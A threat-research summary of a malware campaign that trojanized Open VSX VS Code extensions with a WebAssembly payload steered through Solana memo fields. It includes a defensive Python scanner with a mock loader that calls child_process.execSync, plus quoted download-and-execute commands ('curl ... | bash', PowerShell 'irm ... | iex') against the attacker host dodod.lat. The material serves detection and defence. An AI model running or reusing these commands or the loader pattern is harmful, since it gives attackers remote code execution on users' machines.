GlassWASM: WebAssembly Malware Found in Trojanized Open VSX Extensions

Socket’s Threat Research team uncovered trojanized Open VSX Visual Studio Code extensions that delivered a TinyGo-compiled WebAssembly payload and used Solana memos as a takedown-resistant command-and-control dead drop. The campaign, attributed with medium confidence to the GlassWorm developer, was dubbed “GlassWASM” and involved packages impersonating ExarGD.vsblack and noellee-doc.flint-debug.

Keypoints

  • The malicious packages were trojanized clones of legitimate VS Code extensions republished on Open VSX under the impersonated publisher account zaitoona43.
  • The affected Open VSX packages were exargd/[email protected] and noellee-doc/[email protected].
  • The extensions auto-executed a hidden WebAssembly payload on activation through a TinyGo loader and bootstrap code.
  • The WebAssembly module used ChaCha20 string encryption, leaving no readable network indicators or commands in the static file.
  • It polled the Solana mainnet JSON-RPC API, read attacker instructions from SPL Memo fields, and resolved a rotating second-stage host from on-chain data.
  • The recovered second-stage infrastructure pointed to dodod.lat and platform-specific download-and-execute commands for macOS, Linux, and Windows.
  • The report links this activity to GlassWorm tradecraft and recommends blocking the wallet, hunting Node.js child_process execution, and treating shipped .wasm files in extensions as high risk.
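The last keypoint turns into a concrete pre-install triage step: unpack the extension and flag exactly the traits the report describes (a shipped `.wasm` binary, a loader that calls `child_process`, TinyGo glue, and any of the published indicators). The scanner below is an added example, not Socket's tooling; the indicator strings are copied from this report, while the activation-event heuristic, the severity labels and the constructed sample extension are this example's own assumptions.

```python
"""Static triage of an unpacked Open VSX / VS Code extension for the
GlassWASM traits described in the report. Added example, not Socket's code.
Indicator values come from the report; severities and the activation-event
heuristic are assumptions made for this example."""
from __future__ import annotations

import json
import re
from pathlib import Path

# Indicators copied from the report's IoC list (domain, wallet, memo programs, payload name).
IOC_STRINGS = {
    "dodod.lat": "second-stage host",
    "api.mainnet.solana.com": "Solana JSON-RPC endpoint polled as a dead drop",
    "6ExrZayPZzMMSnszc42cH81DpuKT8FhCX9H6Sesn6rpz": "dead-drop wallet",
    "MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr": "SPL Memo program",
    "Memo1UhkJRfHyvLMcVucJwxXeuD728EqVDDwQDxFM": "SPL Memo program (legacy)",
    "snqpkebiwrxmoivl.wasm": "known payload file name",
}

# Behavioural patterns: the report describes a JS host that loads the module via
# TinyGo's wasm_exec.js / syscall/js bridge and runs commands with child_process.
CHILD_PROCESS_RE = re.compile(r"""require\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]""")
EXEC_RE = re.compile(r"\.(execSync|exec|spawnSync|spawn)\s*\(")
WASM_LOADER_RE = re.compile(r"wasm_exec\.js|WebAssembly\.(instantiate|compile)|syscall/js|\bnew Go\(\)")
# Assumption: a "*" or onStartupFinished activation is how an extension runs without user action.
BROAD_ACTIVATION = {"*", "onStartupFinished"}


def _finding(severity: str, path: str, reason: str) -> dict:
    return {"severity": severity, "file": path, "reason": reason}


def scan_files(files: dict[str, str | bytes]) -> list[dict]:
    """files maps a relative path inside the extension to its content."""
    findings: list[dict] = []
    for rel, content in files.items():
        text = content.decode("utf-8", "ignore") if isinstance(content, bytes) else content
        low = rel.lower()
        if low.endswith(".wasm"):
            # ChaCha20-encrypted strings mean the binary itself will look clean; presence is the signal.
            findings.append(_finding("high", rel, "extension ships a .wasm binary; review before install"))
        if low.endswith((".js", ".cjs", ".mjs", ".ts")):
            if CHILD_PROCESS_RE.search(text) and EXEC_RE.search(text):
                findings.append(_finding("high", rel, "child_process command execution in extension code"))
            if WASM_LOADER_RE.search(text):
                findings.append(_finding("medium", rel, "WebAssembly loader / TinyGo glue present"))
        if low.endswith("package.json"):
            try:
                manifest = json.loads(text)
            except ValueError:
                manifest = {}
            events = manifest.get("activationEvents") or []
            if isinstance(events, list) and any(e in BROAD_ACTIVATION for e in events):
                findings.append(_finding("medium", rel, "activates on startup without a user trigger"))
        for ioc, desc in IOC_STRINGS.items():
            if ioc in text:
                findings.append(_finding("high", rel, f"known indicator {ioc!r} ({desc})"))
    return findings


def scan_directory(root: Path) -> list[dict]:
    """Read an unpacked VSIX (e.g. after `unzip`) from disk and scan it."""
    files = {str(p.relative_to(root)): p.read_bytes() for p in root.rglob("*") if p.is_file()}
    return scan_files(files)


def summarize(findings: list[dict]) -> dict[str, int]:
    counts: dict[str, int] = {}
    for f in findings:
        counts[f["severity"]] = counts.get(f["severity"], 0) + 1
    return counts


# Constructed sample mimicking the described loader; not the real extension contents.
SAMPLE_EXTENSION: dict[str, str | bytes] = {
    "package.json": '{"name": "vsblack", "activationEvents": ["*"], "main": "./extension.js"}',
    "extension.js": (
        'const cp = require("child_process");\n'
        "const go = new Go();\n"
        'WebAssembly.instantiate(require("fs").readFileSync(__dirname + "/snqpkebiwrxmoivl.wasm"), go.importObject)\n'
        "  .then(r => go.run(r.instance));\n"
        "globalThis.__run = cmd => cp.execSync(cmd, { windowsHide: true });\n"
    ),
    "wasm_exec.js": "// constructed stand-in for the TinyGo syscall/js bridge\nglobalThis.Go = class {};\n",
    "snqpkebiwrxmoivl.wasm": b"\x00asm\x01\x00\x00\x00" + bytes(range(32)),
}

BENIGN_EXTENSION: dict[str, str | bytes] = {
    "package.json": '{"name": "ok", "activationEvents": ["onLanguage:python"]}',
    "extension.js": "exports.activate = () => {};\n",
}

if __name__ == "__main__":
    for f in scan_files(SAMPLE_EXTENSION):
        print(f"[{f['severity']:6}] {f['file']}: {f['reason']}")
    print(summarize(scan_files(SAMPLE_EXTENSION)))
```

Run it against a directory with `scan_directory(Path("unpacked-vsix"))`; any `high` finding is a reason to hold the extension for manual review rather than install it, and the `.wasm` rule fires even when the binary carries no readable strings, which is the point of the report's "treat shipped .wasm files as high risk" recommendation.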

MITRE Techniques

  • [T1059.007] JavaScript – The payload is loaded and driven through a JavaScript host using the TinyGo wasm_exec.js glue and syscall/js bridge (“loaded and executed by a JavaScript host”).
  • [T1027] Obfuscated Files or Information – The module hides strings and indicators with ChaCha20 encryption and runtime reconstruction (“Every string of consequence is encrypted in the binary with a ChaCha20 cipher and reconstructed in memory only at runtime”).
  • [T1105] Ingress Tool Transfer – It downloads a second-stage script over HTTPS with curl or Invoke-RestMethod before execution (“curl -fsSL https:///… | bash” and “irm https:///… | iex”).
  • [T1055] Process Injection – Not mentioned.
  • [T1059.004] Unix Shell – The Linux and macOS branches execute downloaded content through bash (“curl -fsSL … | bash”).
  • [T1059.001] PowerShell – The Windows branch runs a fileless command using PowerShell and Invoke-Expression (“powershell -Command "irm … | iex"”).
  • [T1106] Native API – The module invokes Node.js child_process.execSync to spawn commands from the host runtime (“require('child_process').execSync(cmd, { windowsHide:true })”).
  • [T1204] User Execution – The trojanized extensions use fake utility framing and impersonation to trigger activation by the user (“a theme; a ‘transaction hash’ debugger” and “identity impersonation”).
  • [T1569.002] System Services: Service Execution – Not mentioned.
  • [T1587.001] Develop Capabilities: Malware – The payload is a compiled WebAssembly malware family labeled GlassWASM (“we have labeled this family ‘GlassWASM’”).
  • [T1090] Proxy – Not mentioned.
  • [T1071.001] Web Protocols – The malware communicates with the Solana JSON-RPC API over HTTPS (“POST ”).
  • [T1102.002] Bidirectional Communication – Not mentioned.
  • [T1021.004] Remote Services: SSH – Not mentioned.

Indicators of Compromise

  • [File hashes] WebAssembly payload and extension packages – SHA-256 558b4f1d9a263c13756ab0126c09dd080c85ba405b29488e1c4e6aa68b554f1f, SHA-1 8ebac142e34a20c297d3ccaca7ee5d9ddd24fed4, and 2 more hashes.
  • [File names] Malicious WebAssembly payload and VSIX packages – snqpkebiwrxmoivl.wasm, exargd.vsblack-0.0.1.vsix, and 1 more file.
  • [Domains] C2 and Solana endpoint infrastructure – dodod.lat, api.mainnet.solana.com.
  • [URLs] Runtime second-stage download paths – https://dodod.lat/darwin/i/_, https://dodod.lat/linux/i/_.
  • [Wallet address] Solana dead-drop wallet polled for instructions – 6ExrZayPZzMMSnszc42cH81DpuKT8FhCX9H6Sesn6rpz.
  • [Program IDs] SPL Memo programs used to extract attacker instructions – MemoSq4gqABAXKb96qnH8TysNcWxMyWCqXgDLGmfcHr, Memo1UhkJRfHyvLMcVucJwxXeuD728EqVDDwQDxFM.
  • [Package names] Open VSX trojanized extensions – vscode/exargd/[email protected], vscode/noellee-doc/[email protected].
  • [Account / publisher] Malicious Open VSX uploader – github.com/zaitoona43.
  • [Command strings] Fileless execution commands recovered from memory – curl -fsSL https://dodod.lat//i/_ | bash, powershell -Command "irm https://dodod.lat/win32/i/_ | iex".

Read more: https://socket.dev/blog/glasswasm-malware-open-vsx-extensions